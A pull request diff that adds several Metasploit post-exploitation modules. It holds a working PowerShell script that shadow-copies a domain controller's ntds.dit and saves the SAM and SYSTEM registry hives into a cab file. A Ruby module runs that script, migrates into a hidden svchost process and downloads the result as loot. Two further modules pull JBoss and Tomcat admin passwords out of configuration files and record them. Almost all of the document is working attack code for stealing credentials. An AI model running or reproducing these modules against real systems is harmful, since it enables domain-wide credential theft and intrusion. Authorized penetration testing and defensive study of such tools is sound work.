### PR TITLE
Added various new metasploit modules.

### DIFF
--- a/data/post/powershell/NTDSgrab.ps1
+++ b/data/post/powershell/NTDSgrab.ps1
@@ -1,0 +1,138 @@
+﻿#New-CabinetFile originally by Iain Brighton: http://virtualengine.co.uk/2014/creating-cab-files-with-powershell/
+function New-CabinetFile {
+    [CmdletBinding()]
+    Param(
+        [Parameter(HelpMessage="Target .CAB file name.", Position=0, Mandatory=$true, ValueFromPipelineByPropertyName=$true)]
+        [ValidateNotNullOrEmpty()]
+        [Alias("FilePath")]
+        [string] $Name,
+ 
+        [Parameter(HelpMessage="File(s) to add to the .CAB.", Position=1, Mandatory=$true, ValueFromPipeline=$true)]
+        [ValidateNotNullOrEmpty()]
+        [Alias("FullName")]
+        [string[]] $File,
+ 
+        [Parameter(HelpMessage="Default intput/output path.", Position=2, ValueFromPipelineByPropertyName=$true)]
+        [AllowNull()]
+        [string[]] $DestinationPath,
+ 
+        [Parameter(HelpMessage="Do not overwrite any existing .cab file.")]
+        [Switch] $NoClobber
+        )
+ 
+    Begin { 
+    
+        ## If $DestinationPath is blank, use the current directory by default
+        if ($DestinationPath -eq $null) { $DestinationPath = (Get-Location).Path; }
+        Write-Verbose "New-CabinetFile using default path '$DestinationPath'.";
+        Write-Verbose "Creating target cabinet file '$(Join-Path $DestinationPath $Name)'.";
+ 
+        ## Test the -NoClobber switch
+        if ($NoClobber) {
+            ## If file already exists then throw a terminating error
+            if (Test-Path -Path (Join-Path $DestinationPath $Name)) { throw "Output file '$(Join-Path $DestinationPath $Name)' already exists."; }
+        }
+ 
+        ## Cab files require a directive file, see 'http://msdn.microsoft.com/en-us/library/bb417343.aspx#dir_file_syntax' for more info
+        $ddf = ";*** MakeCAB Directive file`r`n";
+        $ddf += ";`r`n";
+        $ddf += ".OPTION EXPLICIT`r`n";
+        $ddf += ".Set CabinetNameTemplate=$Name`r`n";
+        $ddf += ".Set DiskDirectory1=$DestinationPath`r`n";
+        $ddf += ".Set MaxDiskSize=0`r`n";
+        $ddf += ".Set Cabinet=on`r`n";
+        $ddf += ".Set Compress=on`r`n";
+        ## Redirect the auto-generated Setup.rpt and Setup.inf files to the temp directory
+        $ddf += ".Set RptFileName=$(Join-Path $ENV:TEMP "setup.rpt")`r`n";
+        $ddf += ".Set InfFileName=$(Join-Path $ENV:TEMP "setup.inf")`r`n";
+ 
+        ## If -Verbose, echo the directive file
+        if ($PSCmdlet.MyInvocation.BoundParameters["Verbose"].IsPresent) {
+            foreach ($ddfLine in $ddf -split [Environment]::NewLine) {
+                Write-Verbose $ddfLine;
+            }
+        }
+    }
+ 
+    Process {
+   
+        ## Enumerate all the files add to the cabinet directive file
+        foreach ($fileToAdd in $File) {
+        
+            ## Test whether the file is valid as given and is not a directory
+            if (Test-Path $fileToAdd -PathType Leaf) {
+                Write-Verbose """$fileToAdd""";
+                $ddf += """$fileToAdd""`r`n";
+            }
+            ## If not, try joining the $File with the (default) $DestinationPath
+            elseif (Test-Path (Join-Path $DestinationPath $fileToAdd) -PathType Leaf) {
+                Write-Verbose """$(Join-Path $DestinationPath $fileToAdd)""";
+                $ddf += """$(Join-Path $DestinationPath $fileToAdd)""`r`n";
+            }
+            else { Write-Warning "File '$fileToAdd' is an invalid file or container object and has been ignored."; }
+        }       
+    }
+ 
+    End {
+    
+        $ddfFile = Join-Path $DestinationPath "$Name.ddf";
+        $ddf | Out-File $ddfFile -Encoding ascii | Out-Null;
+ 
+        Write-Verbose "Launching 'MakeCab /f ""$ddfFile""'.";
+        $makeCab = Invoke-Expression "MakeCab /F ""$ddfFile""";
+ 
+        ## If Verbose, echo the MakeCab response/output
+        if ($PSCmdlet.MyInvocation.BoundParameters["Verbose"].IsPresent) {
+            ## Recreate the output as Verbose output
+            foreach ($line in $makeCab -split [environment]::NewLine) {
+                if ($line.Contains("ERROR:")) { throw $line; }
+                else { Write-Verbose $line; }
+            }
+        }
+ 
+        ## Delete the temporary .ddf file
+        Write-Verbose "Deleting the directive file '$ddfFile'.";
+        Remove-Item $ddfFile;
+ 
+        ## Return the newly created .CAB FileInfo object to the pipeline
+        Get-Item (Join-Path $DestinationPath $Name);
+    }
+}
+
+$key = "HKLM:\SYSTEM\CurrentControlSet\Services\NTDS\Parameters"
+$ntdsloc = (Get-ItemProperty -Path $key -Name "DSA Database file")."DSA Database file"
+$ntdspath = $ntdsloc.split(":")[1]
+$ntdsdisk = $ntdsloc.split(":")[0]
+
+(Get-WmiObject -list win32_shadowcopy).create($ntdsdisk + ":\","ClientAccessible")
+
+$id_shadow = "None"
+$volume_shadow = "None"
+
+if (!(Get-WmiObject win32_shadowcopy).length){
+    Write-Host "Only one shadow clone"
+    $id_shadow = (Get-WmiObject win32_shadowcopy).ID
+    $volume_shadow = (Get-WmiObject win32_shadowcopy).DeviceObject
+} Else {
+    $n_shadows = (Get-WmiObject win32_shadowcopy).length-1
+    $id_shadow = (Get-WmiObject win32_shadowcopy)[$n_shadows].ID
+    $volume_shadow = (Get-WmiObject win32_shadowcopy)[$n_shadows].DeviceObject
+}
+
+$command = "cmd.exe /c copy "+ $volume_shadow + $ntdspath + " " + ".\ntds.dit"
+iex $command
+
+$command2 = "cmd.exe /c reg save HKLM\SYSTEM .\SYSTEM"
+iex $command2
+
+$command3 = "cmd.exe /c reg save HKLM\SAM .\SAM"
+iex $command3
+
+(Get-WmiObject -Namespace root\cimv2 -Class Win32_ShadowCopy | Where-Object {$_.DeviceObject -eq $volume_shadow}).Delete()
+if (Test-Item "All.cab"){
+   Remove-Item "All.cab" 
+}
+New-CabinetFile -Name All.cab -File "SAM","SYSTEM","ntds.dit"
+Remove-Item ntds.dit
+Remove-Item SAM
+Remove-Item SYSTEM

--- a/data/post/powershell/NTDSgrab.ps1
+++ b/data/post/powershell/NTDSgrab.ps1
@@ -1,4 +1,5 @@
-﻿#New-CabinetFile originally by Iain Brighton: http://virtualengine.co.uk/2014/creating-cab-files-with-powershell/
+﻿#Complete script created by Koen Riepe (koen.riepe@fox-it.com)
+#New-CabinetFile originally by Iain Brighton: http://virtualengine.co.uk/2014/creating-cab-files-with-powershell/
 function New-CabinetFile {
     [CmdletBinding()]
     Param(

--- a/modules/post/multi/gather/jboss_gather.rb
+++ b/modules/post/multi/gather/jboss_gather.rb
@@ -47,7 +47,6 @@ class MetasploitModule < Msf::Post
                 protocol: 'tcp',
                 workspace_id: myworkspace_id
             }
-
             create_credential_login(login_data)
     end
 

--- a/modules/post/multi/gather/jboss_gather.rb
+++ b/modules/post/multi/gather/jboss_gather.rb
@@ -1,0 +1,267 @@
+require 'msf/core'
+require 'nokogiri'
+
+class MetasploitModule < Msf::Post
+    include Msf::Post::File
+    include Msf::Post::Linux::System
+
+    def initialize(info={})
+    super(update_info(info,
+        'Name'          => 'Jboss credential collector',
+        'Description'   => %q{
+          This module can be used to extract the Jboss admin passwords for version 4,5 and 6.
+        },
+        'License'       => MSF_LICENSE,
+        'Author'        => [ 'Koen Riepe (koen.riepe@fox-it.com)' ],
+        'Platform'      => [ 'linux', 'win' ],
+        'SessionTypes'  => [ 'meterpreter' ]
+    ))
+    end
+
+    def report_creds(user, pass, port)
+        return if (user.empty? or pass.empty?)
+            # Assemble data about the credential objects we will be creating
+            credential_data = {
+                origin_type: :session,
+                post_reference_name: self.fullname,
+                private_data: pass,
+                private_type: :password,
+                session_id: session_db_id,
+                username: user,
+                workspace_id: myworkspace_id,
+            }
+
+            credential_core = create_credential(credential_data)
+            
+            if not port.is_a? Integer
+                print_status("Port not an Integer, Something probably went wrong")
+                port = 8080
+            end
+
+            login_data = {
+                core: credential_core,
+                status: Metasploit::Model::Login::Status::UNTRIED,
+                address: ::Rex::Socket.getaddress(session.sock.peerhost, true),
+                port: port,
+                service_name: 'jboss',
+                protocol: 'tcp',
+                workspace_id: myworkspace_id
+            }
+
+            create_credential_login(login_data)
+    end
+
+    def OScheck()
+    os  = ""
+    if exist?("/etc/passwd")
+      os =  "unix"
+    else
+      os = "win"
+    end
+    return os
+    end
+
+    def getpw(file, ports)
+        i = 0
+        file.each do |pwfile|
+            lines = read_file(pwfile).split("\n")
+              for line in lines
+                  if not line.include? "#"
+                      creds = line.split("=")
+                      print_good("Username: " + creds[0] + " Password: " + creds[1])
+                      report_creds(creds[0],creds[1],ports[i])
+                  end
+              end
+              i+=1
+        end
+    end
+
+    def getversion(array)
+        i = 0
+        version = "NONE"
+        results = Array.new
+        while i < array.count
+            downcase = array[i].downcase
+            if downcase.include? "jboss"
+                file = read_file(array[i])
+                xml_doc  = Nokogiri::XML(file)
+                xml_doc.xpath("//jar-versions//jar").each do |node|
+                    if node["name"] == "jbossweb.jar"
+                        version = node["specVersion"][0]
+                        results.push(version)
+                    end
+                end
+            end
+            if not version == "NONE"
+                print_status("Found a Jboss installation version:" + version)
+            end
+            i+=1
+        end
+        return results
+    end
+
+    def readhome(array)
+        home = ""
+        array.each do |item|
+            if item.include? "JBOSS_HOME"
+                home = item.split("JBOSS_HOME=")[1]
+            end
+        end
+        return home
+    end
+
+    def getpwfiles(array,home)
+        pwfiles = Array.new
+        array.each do |location|
+            if location.include? home
+                pwfiles.push(location)
+            end
+        end
+        return pwfiles
+    end
+
+    def getports()
+        type1 = cmd_exec('locate bindings-jboss-beans.xml').split("\n")
+        type2 = cmd_exec('locate jboss-web.deployer/server.xml').split("\n")
+        port = Array.new
+
+        type1.each do |file1|
+            print_status("Bind file found: " + file1)
+            xml1  = Nokogiri::XML(read_file(file1))
+            xml1.css("//deployment//bean//constructor//parameter//bean").each do |connector|
+                if connector.css("property[name='serviceName']").text == "jboss.web:service=WebServer"
+                    port.push(connector.css("property[name='port']").text.to_i)
+                    break
+                end
+            end
+        end
+
+        type2.each do |file2|
+            print_status("Bind file found: " + file2)
+            xml2  = Nokogiri::XML(read_file(file2))
+            xml2.xpath("//Server//Connector").each do |connector|
+                if connector['protocol'].include? "HTTP"
+                    port.push(connector['port'].to_i)
+                    break
+                end
+            end
+        end
+        return port
+    end
+
+    def gathernix()
+        print_status("Unix OS detected, attempting to locate Jboss services")
+        version = getversion(cmd_exec('locate jar-versions.xml').split("\n"))
+          home = readhome(cmd_exec('printenv').split("\n"))
+          pwfiles = getpwfiles(cmd_exec('locate jmx-console-users.properties').split("\n"),home)
+          listenports = getports()
+          getpw(pwfiles,listenports)
+    end
+
+    def winhome()
+        exec = cmd_exec('WMIC PROCESS get Caption,Commandline').split("\n")
+           exec.each do |line|
+               if line.downcase.include? "java.exe" and line.downcase.include? "jboss"
+                   print_status("Jboss process found")
+                   home = line.split('-classpath "')[1].split("\\bin\\")[0]
+                   return home
+               end
+           end
+       end
+
+       def wingetinstances(home)
+           instances = Array.new
+           instance_location = home + "\\server"
+           exec = cmd_exec('cmd /c dir ' + instance_location).split("\n")
+           exec.each do |instance|
+               if instance.split("<DIR>")[1]
+                   if (not instance.split("<DIR>")[1].strip().include? ".") and (not instance.split("<DIR>")[1].strip().include? "..")
+                       instance_path = home + "\\server\\" + (instance.split("<DIR>")[1].strip())
+                       instances.push(instance_path)
+                       #print_good(instance_path)
+                   end
+               end
+           end
+           return instances
+       end
+
+       def winpwfiles(instances)
+           files = Array.new
+           instances.each do |seed|
+               file_path = seed + "\\conf\\props\\jmx-console-users.properties"
+               if exist?(file_path) 
+                   files.push(file_path)
+               end
+           end
+           return files
+       end
+
+       def wingetport(instances)
+           port = Array.new
+
+        instances.each do |seed|
+            path1 = seed + "\\conf\\bindingservice.beans\\META-INF\\bindings-jboss-beans.xml"
+            path2 = seed + "\\deploy\\jboss-web.deployer\\server.xml"
+
+            if exist?(path1)
+                file1 = read_file(seed + "\\conf\\bindingservice.beans\\META-INF\\bindings-jboss-beans.xml").split("\n")
+            end
+
+            if exist?(path2)
+                file2 = read_file(seed + "\\deploy\\jboss-web.deployer\\server.xml")
+            end
+
+            if file1
+                print_status("Bind file found: " + seed + "\\conf\\bindingservice.beans\\META-INF\\bindings-jboss-beans.xml")
+                parse = false
+                nextport = false
+                file1.each do |line|
+                    if line.strip() == '<bean class="org.jboss.services.binding.ServiceBindingMetadata">'
+                        parse = true
+                    elsif line.strip() == '</bean>'
+                        parse = false
+                    elsif parse and line.include? "HttpConnector"
+                        nextport = true
+                    elsif parse and nextport
+                        port.push(line.split('<property name="port">')[1].split('<')[0].to_i)
+                        nextport = false
+                    end
+                end
+            end
+
+            if file2
+                print_status("Bind file found: " + seed + "\\deploy\\jboss-web.deployer\\server.xml")
+                xml2  = Nokogiri::XML(file2)
+                xml2.xpath("//Server//Connector").each do |connector|
+                    if connector['protocol'].include? "HTTP"
+                        print_status(connector['port'])
+                        port.push(connector['port'].to_i)
+                        break
+                    end
+                end
+            end
+        end
+        return port
+       end
+
+    def gatherwin()
+        print_status("Windows OS detected, enumerating services")
+        home = winhome()
+        version_file = Array.new
+        version_file.push(home + "\\jar-versions.xml")
+        version = getversion(version_file)
+        instances = wingetinstances(home)
+        pwfiles = winpwfiles(instances)
+        listenports = wingetport(instances)
+        getpw(pwfiles,listenports)
+    end
+
+    def run
+        if OScheck() == "win"
+          gatherwin()
+        else 
+          gathernix()
+        end
+    end
+
+end

--- a/modules/post/multi/gather/jboss_gather.rb
+++ b/modules/post/multi/gather/jboss_gather.rb
@@ -7,7 +7,7 @@ class MetasploitModule < Msf::Post
 
     def initialize(info={})
     super(update_info(info,
-        'Name'          => 'Jboss credential collector',
+        'Name'          => 'Jboss Credential Collector',
         'Description'   => %q{
           This module can be used to extract the Jboss admin passwords for version 4,5 and 6.
         },
@@ -32,7 +32,7 @@ class MetasploitModule < Msf::Post
             }
 
             credential_core = create_credential(credential_data)
-            
+
             if not port.is_a? Integer
                 print_status("Port not an Integer, Something probably went wrong")
                 port = 8080
@@ -50,7 +50,7 @@ class MetasploitModule < Msf::Post
             create_credential_login(login_data)
     end
 
-    def OScheck()
+    def os_check()
     os  = ""
     if exist?("/etc/passwd")
       os =  "unix"
@@ -188,7 +188,7 @@ class MetasploitModule < Msf::Post
            files = Array.new
            instances.each do |seed|
                file_path = seed + "\\conf\\props\\jmx-console-users.properties"
-               if exist?(file_path) 
+               if exist?(file_path)
                    files.push(file_path)
                end
            end
@@ -256,9 +256,9 @@ class MetasploitModule < Msf::Post
     end
 
     def run
-        if OScheck() == "win"
+        if os_check() == "win"
           gatherwin()
-        else 
+        else
           gathernix()
         end
     end

--- a/modules/post/multi/gather/tomcat_gather.rb
+++ b/modules/post/multi/gather/tomcat_gather.rb
@@ -26,7 +26,6 @@ class MetasploitModule < Msf::Post
 username = []
 password = []
 port = 0 
-
   def report_creds(user, pass, port)
     return if (user.empty? or pass.empty?)
       # Assemble data about the credential objects we will be creating

--- a/modules/post/multi/gather/tomcat_gather.rb
+++ b/modules/post/multi/gather/tomcat_gather.rb
@@ -10,7 +10,7 @@ class MetasploitModule < Msf::Post
 
   def initialize(info={})
     super( update_info( info,
-      'Name'          => 'Gather Tomcat credentials',
+      'Name'          => 'Gather Tomcat Credentials',
       'Description'   => %q{
         This module will attempt to collect credentials from Tomcat services running on the machine.
       },
@@ -25,7 +25,8 @@ class MetasploitModule < Msf::Post
 
 username = []
 password = []
-port = 0 
+port = 0
+
   def report_creds(user, pass, port)
     return if (user.empty? or pass.empty?)
       # Assemble data about the credential objects we will be creating
@@ -40,7 +41,7 @@ port = 0
       }
 
       credential_core = create_credential(credential_data)
-      
+
       if not port.is_a? Integer
         print_status("Port not an Integer")
         port = 8080
@@ -59,7 +60,7 @@ port = 0
         create_credential_login(login_data)
   end
 
-  def OScheck()
+  def os_check()
     os  = ""
     if exist?("/etc/passwd")
       os =  "unix"
@@ -153,9 +154,9 @@ port = 0
   end
 
   def run()
-    if OScheck() == "win"
+    if os_check() == "win"
       gatherwin()
-    else 
+    else
       gathernix()
     end
 

--- a/modules/post/multi/gather/tomcat_gather.rb
+++ b/modules/post/multi/gather/tomcat_gather.rb
@@ -1,0 +1,175 @@
+require 'rex'
+require 'rexml/document'
+require 'msf/core'
+require 'msf/core/auxiliary/report'
+
+class MetasploitModule < Msf::Post
+
+  include Msf::Post::File
+  include Msf::Post::Windows::Services
+
+  def initialize(info={})
+    super( update_info( info,
+      'Name'          => 'Gather Tomcat credentials',
+      'Description'   => %q{
+        This module will attempt to collect credentials from Tomcat services running on the machine.
+      },
+      'License'       => MSF_LICENSE,
+      'Author'        => [
+        'Koen Riepe <koen.riepe@fox-it.com>', # Module author
+      ],
+      'Platform'      => [ 'win', 'linux' ],
+      'SessionTypes'  => [ 'meterpreter' ]
+    ))
+  end
+
+username = []
+password = []
+port = 0 
+
+  def report_creds(user, pass, port)
+    return if (user.empty? or pass.empty?)
+      # Assemble data about the credential objects we will be creating
+      credential_data = {
+        origin_type: :session,
+        post_reference_name: self.fullname,
+        private_data: pass,
+        private_type: :password,
+        session_id: session_db_id,
+        username: user,
+        workspace_id: myworkspace_id,
+      }
+
+      credential_core = create_credential(credential_data)
+      
+      if not port.is_a? Integer
+        print_status("Port not an Integer")
+        port = 8080
+      end
+
+      login_data = {
+            core: credential_core,
+            status: Metasploit::Model::Login::Status::UNTRIED,
+            address: ::Rex::Socket.getaddress(session.sock.peerhost, true),
+            port: port,
+            service_name: 'Tomcat',
+            protocol: 'tcp',
+            workspace_id: myworkspace_id
+        }
+
+        create_credential_login(login_data)
+  end
+
+  def OScheck()
+    os  = ""
+    if exist?("/etc/passwd")
+      os =  "unix"
+    else
+      os = "win"
+    end
+    return os
+  end
+
+  def gatherwin()
+    print_status("Windows OS detected, enumerating services")
+    service_list.each do |service|
+      if service[:name].downcase().include? "tomcat"
+        print_good("Tomcat service found")
+        tomcat_home = service_info(service[:name])[:path].split("\\bin\\")[0]
+        conf_path = tomcat_home.split('"')[1] + "\\conf\\tomcat-users.xml"
+
+        if exist?(conf_path)
+          print_status("tomcat-users.xml found")
+          xml = read_file(conf_path).split("\n")
+
+          comment_block = false
+          xml.each do |line|
+            if line.include? "<user username=" and not comment_block
+              $username.push(line.split('<user username="')[1].split('"')[0])
+              $password.push(line.split('password="')[1].split('"')[0])
+            elsif line.include? ("<!--")
+              comment_block = true
+            elsif line.include? ("-->") and comment_block
+              comment_block = false
+            end
+          end
+        end
+
+        port_path = tomcat_home.split('"')[1] + "\\conf\\server.xml"
+        if exist?(port_path)
+          xml = read_file(port_path).split("\n")
+        end
+        comment_block = false
+        xml.each do |line|
+          if line.include? "<Connector" and not comment_block
+            $port = line.split('<Connector port="')[1].split('"')[0].to_i
+          elsif line.include? ("<!--")
+            comment_block = true
+          elsif line.include? ("-->") and comment_block
+            comment_block = false
+          end
+        end
+      end
+    end
+  end
+
+  def gathernix()
+    print_status("Unix OS detected")
+    user_files = cmd_exec('locate tomcat-users.xml').split("\n")
+    user_files.each do |path|
+      if exist?(path)
+          print_status("tomcat-users.xml found")
+          xml = read_file(path).split("\n")
+
+          comment_block = false
+          xml.each do |line|
+            if line.include? "<user username=" and not comment_block
+              $username.push(line.split('<user username="')[1].split('"')[0])
+              $password.push(line.split('password="')[1].split('"')[0])
+            elsif line.include? ("<!--")
+              comment_block = true
+            elsif line.include? ("-->") and comment_block
+              comment_block = false
+            end
+          end
+        end
+    end
+
+    port_path = cmd_exec('locate server.xml').split("\n")
+    port_path.each do |path|
+      if exist?(path)
+          xml = read_file(path).split("\n")
+          comment_block = false
+          xml.each do |line|
+            if line.include? "<Connector" and not comment_block
+              $port = line.split('<Connector port="')[1].split('"')[0].to_i
+            elsif line.include? ("<!--")
+              comment_block = true
+            elsif line.include? ("-->") and comment_block
+              comment_block = false
+            end
+          end
+      end
+    end
+  end
+
+  def run()
+    if OScheck() == "win"
+      gatherwin()
+    else 
+      gathernix()
+    end
+
+  i=0
+  while i < $username.count
+    report_creds($username[i],$password[i],$port)
+    i+=1
+  end
+
+  $username = []
+  $password = []
+  $port = 0
+
+  end
+
+end

--- a/modules/post/windows/gather/ntds_grabber.rb
+++ b/modules/post/windows/gather/ntds_grabber.rb
@@ -10,7 +10,7 @@ class MetasploitModule < Msf::Post
     def initialize(info={})
         super(update_info(info,
           'Name'          => 'NTDS Grabber',
-          'Description'   => %q{This module uses a powershell script to obtain a copy of the ntds.dit, SAM and SYSTEM files on a domain controller. It puts all these files in a .cab file called All.cab in the current working directory.},
+          'Description'   => %q{This module uses a powershell script to obtain a copy of the ntds,dit SAM and SYSTEM files on a domain controller. It compresses all these files in a cabinet file called All.cab.},
           'License'       => MSF_LICENSE,
           'Author'        => ['Koen Riepe (koen.riepe@fox-it.com)'],
           'References'    => [''],

--- a/modules/post/windows/gather/ntds_grabber.rb
+++ b/modules/post/windows/gather/ntds_grabber.rb
@@ -1,0 +1,149 @@
+require 'msf/core'
+
+class MetasploitModule < Msf::Post
+    include Msf::Post::Windows::Powershell
+    include Msf::Post::Windows::Priv
+    include Msf::Post::Windows::Registry
+    include Msf::Post::File
+    include Msf::Post::Common
+
+    def initialize(info={})
+        super(update_info(info,
+          'Name'          => 'NTDS Grabber',
+          'Description'   => %q{This module uses a powershell script to obtain a copy of the ntds.dit, SAM and SYSTEM files on a domain controller. It puts all these files in a .cab file called All.cab in the current working directory.},
+          'License'       => MSF_LICENSE,
+          'Author'        => ['Koen Riepe (koen.riepe@fox-it.com)'],
+          'References'    => [''],
+          'Platform'      => [ 'win' ],
+          'Arch'          => [ 'x86', 'x64' ],
+          'SessionTypes'  => [ 'meterpreter' ]
+        ))
+
+    register_options(
+    [
+      OptBool.new('DOWNLOAD', [ true, 'Immediately download the All.cab file', true ]),
+      OptBool.new('CLEANUP', [ true, 'Remove the All.cab file at the end of module execution', true ])
+    ], self.class)
+    end
+
+    def is_dc()
+    is_dc_srv = false
+    serviceskey = "HKLM\\SYSTEM\\CurrentControlSet\\Services"
+        if registry_enumkeys(serviceskey).include?("NTDS")
+            if registry_enumkeys(serviceskey + "\\NTDS").include?("Parameters")
+                is_dc_srv = true
+            end
+        end
+        return is_dc_srv
+    end
+
+    def taskRunning(task)
+        session.shell_write("tasklist \n")
+        tasklist = session.shell_read(-1,10).split("\n")
+        tasklist.each do |prog|
+            if prog.include? task
+                session.shell_close()
+                return true
+            end
+        end
+        return false
+    end
+
+    def Is32BitOn64Bits()
+        apicall = session.railgun.kernel32.IsWow64Process(-1,4)["Wow64Process"]
+        if apicall == "\x00\x00\x00\x00"
+            migrate = false
+        else
+            migrate = true
+        end
+        return migrate
+    end
+
+    def GetWindowsLoc()
+        apicall = session.railgun.kernel32.GetEnvironmentVariableA("Windir",255,255)["lpBuffer"]
+        windir = apicall.split(":")[0]
+        return windir
+    end
+
+    def run
+        downloadflag = datastore['DOWNLOAD']
+        cleanupflag = datastore['CLEANUP']
+
+        if is_system?
+            print_good("Running as SYSTEM")
+        else
+            print_error("Not running as SYSTEM, you need to be system to run this module! STOPPING")
+            return
+        end
+
+        if not is_dc()
+            print_error("Not running on a domain controller, you need run this module on a domain controller! STOPPING")
+            return
+        else
+            print_good("Running on a domain controller")
+        end
+
+        if have_powershell?
+            print_good("PowerShell is installed.")
+        else
+            print_error("PowerShell is not installed! STOPPING")
+            return
+        end
+
+        if Is32BitOn64Bits()
+            print_error("The meterpreter is not the same architecture as the OS! Migrating to process matching architecture!")
+            windir = GetWindowsLoc()
+            newproc = windir + ':\windows\sysnative\svchost.exe'
+            if exist?(newproc)
+                print_status("Starting new x64 process #{newproc}")
+                pid = session.sys.process.execute(newproc,nil,{'Hidden' => true,'Suspended' => true}).pid
+                print_good("Got pid #{pid}")
+                print_status("Migrating..")
+                session.core.migrate(pid)
+                if pid == session.sys.process.getpid
+                    print_good("Success!")
+                else
+                    print_error("Migration failed!")
+                end
+            end
+        else 
+            print_good("The meterpreter is the same architecture as the OS!")
+        end
+
+        base_script = File.read(File.join(Msf::Config.data_directory, "post", "powershell", "NTDSgrab.ps1"))
+        execute_script(base_script)
+        print_status("Powershell Script executed")
+        cabcount = 0
+
+        while cabcount < 2
+            if taskRunning("makecab.exe")
+                cabcount += 1
+                while cabcount < 2
+                    print_status("Creating All.cab")
+                    if not taskRunning("makecab.exe")
+                        cabcount += 1
+                        while not file_exist?("All.cab")
+                            sleep(1)
+                            print_status("Waiting for All.cab")
+                        end
+                        print_good("All.cab should be created in the current working directory")
+                    end
+                    sleep(1)
+                end
+            end
+            sleep(1)
+        end
+
+        if downloadflag
+            print_status("Downloading All.cab")
+            p1 = store_loot("Cabinet File", "application/cab", session, read_file("All.cab"), "All.cab", "Cabinet file containing SAM, SYSTEM and NTDS.dit")
+            print_good("All.cab saved in: #{p1.to_s}")
+        end
+
+        if cleanupflag
+            print_status("Removing All.cab")
+            file_rm('All.cab')
+            print_good("All.cab Removed")
+        end
+    end
+end

--- a/modules/post/windows/gather/ntds_grabber.rb
+++ b/modules/post/windows/gather/ntds_grabber.rb
@@ -10,7 +10,7 @@ class MetasploitModule < Msf::Post
     def initialize(info={})
         super(update_info(info,
           'Name'          => 'NTDS Grabber',
-          'Description'   => %q{This module uses a powershell script to obtain a copy of the ntds,dit SAM and SYSTEM files on a domain controller. It compresses all these files in a cabinet file called All.cab.},
+          'Description'   => %q{This module uses a powershell script to obtain a copy of the ntds,dit SAM and SYSTEM files on a domain controller. It compresses     all these files in a cabinet file called All.cab.},
           'License'       => MSF_LICENSE,
           'Author'        => ['Koen Riepe (koen.riepe@fox-it.com)'],
           'References'    => [''],
@@ -37,7 +37,7 @@ class MetasploitModule < Msf::Post
         return is_dc_srv
     end
 
-    def taskRunning(task)
+    def task_running(task)
         session.shell_write("tasklist \n")
         tasklist = session.shell_read(-1,10).split("\n")
         tasklist.each do |prog|
@@ -49,7 +49,7 @@ class MetasploitModule < Msf::Post
         return false
     end
 
-    def Is32BitOn64Bits()
+    def is_32_bit_on_64_bits()
         apicall = session.railgun.kernel32.IsWow64Process(-1,4)["Wow64Process"]
         if apicall == "\x00\x00\x00\x00"
             migrate = false
@@ -59,7 +59,7 @@ class MetasploitModule < Msf::Post
         return migrate
     end
 
-    def GetWindowsLoc()
+    def get_windows_loc()
         apicall = session.railgun.kernel32.GetEnvironmentVariableA("Windir",255,255)["lpBuffer"]
         windir = apicall.split(":")[0]
         return windir
@@ -90,9 +90,9 @@ class MetasploitModule < Msf::Post
             return
         end
 
-        if Is32BitOn64Bits()
+        if is_32_bit_on_64_bits()
             print_error("The meterpreter is not the same architecture as the OS! Migrating to process matching architecture!")
-            windir = GetWindowsLoc()
+            windir = get_windows_loc()
             newproc = windir + ':\windows\sysnative\svchost.exe'
             if exist?(newproc)
                 print_status("Starting new x64 process #{newproc}")
@@ -106,7 +106,7 @@ class MetasploitModule < Msf::Post
                     print_error("Migration failed!")
                 end
             end
-        else 
+        else
             print_good("The meterpreter is the same architecture as the OS!")
         end
 
@@ -116,11 +116,11 @@ class MetasploitModule < Msf::Post
         cabcount = 0
 
         while cabcount < 2
-            if taskRunning("makecab.exe")
+            if task_running("makecab.exe")
                 cabcount += 1
                 while cabcount < 2
                     print_status("Creating All.cab")
-                    if not taskRunning("makecab.exe")
+                    if not task_running("makecab.exe")
                         cabcount += 1
                         while not file_exist?("All.cab")
                             sleep(1)
@@ -146,4 +146,3 @@ class MetasploitModule < Msf::Post
             print_good("All.cab Removed")
         end
     end
-end

--- a/modules/post/windows/manage/archmigrate.rb
+++ b/modules/post/windows/manage/archmigrate.rb
@@ -4,6 +4,7 @@ class MetasploitModule < Msf::Post
   include Msf::Post::Windows::Registry
   include Msf::Post::File
   include Msf::Post::Common
+
     def initialize(info={})
         super(update_info(info,
           'Name'          => 'Architicture Migrate',
@@ -16,6 +17,7 @@ class MetasploitModule < Msf::Post
           'SessionTypes'  => [ 'meterpreter' ]
         ))
     end
+
     def is_32_bit_on_64_bits()
         apicall = session.railgun.kernel32.IsWow64Process(-1,4)["Wow64Process"]
         if apicall == "\x00\x00\x00\x00"
@@ -25,11 +27,13 @@ class MetasploitModule < Msf::Post
         end
         return migrate
     end
+
     def get_windows_loc()
         apicall = session.railgun.kernel32.GetEnvironmentVariableA("Windir",255,255)["lpBuffer"]
         windir = apicall.split(":")[0]
         return windir
     end
+
     def run
         if is_32_bit_on_64_bits()
             print_error("The meterpreter is not the same architecture as the OS! Upgrading!")

--- a/modules/post/windows/manage/archmigrate.rb
+++ b/modules/post/windows/manage/archmigrate.rb
@@ -4,7 +4,6 @@ class MetasploitModule < Msf::Post
   include Msf::Post::Windows::Registry
   include Msf::Post::File
   include Msf::Post::Common
-
     def initialize(info={})
         super(update_info(info,
           'Name'          => 'Architicture Migrate',
@@ -17,8 +16,7 @@ class MetasploitModule < Msf::Post
           'SessionTypes'  => [ 'meterpreter' ]
         ))
     end
-
-    def Is32BitOn64Bits()
+    def is_32_bit_on_64_bits()
         apicall = session.railgun.kernel32.IsWow64Process(-1,4)["Wow64Process"]
         if apicall == "\x00\x00\x00\x00"
             migrate = false
@@ -27,17 +25,15 @@ class MetasploitModule < Msf::Post
         end
         return migrate
     end
-
-    def GetWindowsLoc()
+    def get_windows_loc()
         apicall = session.railgun.kernel32.GetEnvironmentVariableA("Windir",255,255)["lpBuffer"]
         windir = apicall.split(":")[0]
         return windir
     end
-
     def run
-        if Is32BitOn64Bits()
+        if is_32_bit_on_64_bits()
             print_error("The meterpreter is not the same architecture as the OS! Upgrading!")
-            windir = GetWindowsLoc()
+            windir = get_windows_loc()
             newproc = windir + ':\windows\sysnative\svchost.exe'
             if exist?(newproc)
                 print_status("Starting new x64 process #{newproc}")
@@ -51,7 +47,7 @@ class MetasploitModule < Msf::Post
                     print_error("Migration failed!")
                 end
             end
-        else 
+        else
             print_good("The meterpreter is the same architecture as the OS!")
         end
     end

--- a/modules/post/windows/manage/archmigrate.rb
+++ b/modules/post/windows/manage/archmigrate.rb
@@ -1,0 +1,58 @@
+require 'msf/core'
+
+class MetasploitModule < Msf::Post
